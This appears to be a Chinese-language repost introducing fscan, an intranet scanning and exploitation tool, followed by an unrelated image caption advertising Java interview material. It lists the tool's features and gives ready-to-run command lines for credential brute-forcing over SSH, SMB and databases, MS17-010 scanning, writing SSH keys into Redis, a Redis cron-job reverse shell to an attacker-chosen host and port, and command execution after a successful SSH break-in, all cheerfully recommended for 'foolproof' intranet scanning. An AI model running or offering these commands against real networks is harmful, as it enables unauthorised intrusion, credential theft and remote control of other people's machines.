fscan簡介
一款内網綜合掃描工具,友善一鍵自動化、全方位漏掃掃描。
支援主機存活探測、端口掃描、常見服務的爆破、ms17010、redis批量寫公鑰、計劃任務反彈shell、讀取win網卡資訊、web指紋識别、web漏洞掃描、netbios探測、域控識别等功能
主要功能
1.資訊搜集:
- 存活探測(icmp)
- 端口掃描
2.爆破功能:
- 各類服務爆破(ssh、smb等)
- 資料庫密碼爆破(mysql、mssql、redis、psql等)
3.系統資訊、漏洞掃描:
- netbios探測、域控識别
- 擷取目标網卡資訊
- 高危漏洞掃描(ms17010等)
4.Web探測功能:
- webtitle探測
- web指紋識别(常見cms、oa架構等)
- web漏洞掃描(weblogic、st2等,支援xray的poc)
5.漏洞利用:
- redis寫公鑰或寫計劃任務
- ssh指令執行
6.其他功能:
- 檔案儲存
usege
簡單用法
fscan.exe -h 192.168.1.1/24 (預設使用全部子產品)
fscan.exe -h 192.168.1.1/16 (B段掃描) 其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不儲存檔案、跳過web poc掃描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功後,指令執行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定子產品ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加載指定檔案的使用者名、密碼來進行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結果儲存路徑,預設儲存在目前路徑)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,友善快速檢視網段資訊 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定子產品)
fscan.exe -hf ip.txt (以檔案導入)
fscan.exe -u http://baidu.com -proxy 8080 (掃描單個url,并設定http代理 http://127.0.0.1:8080) 牛就完了!
随便傻瓜式掃一下内網
官方文檔以及fscan下載下傳連結 https://github.com/shadow1ng/fscan
![秒懂JVM的三大參數類型,就靠這十個小實驗了初級—中級—進階三個級别的大廠面試真題阿裡雲——Java 實習生/初級美團——Java 中級螞蟻金服——Java 進階基礎篇JVM 篇MySQL 篇Redis 篇[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)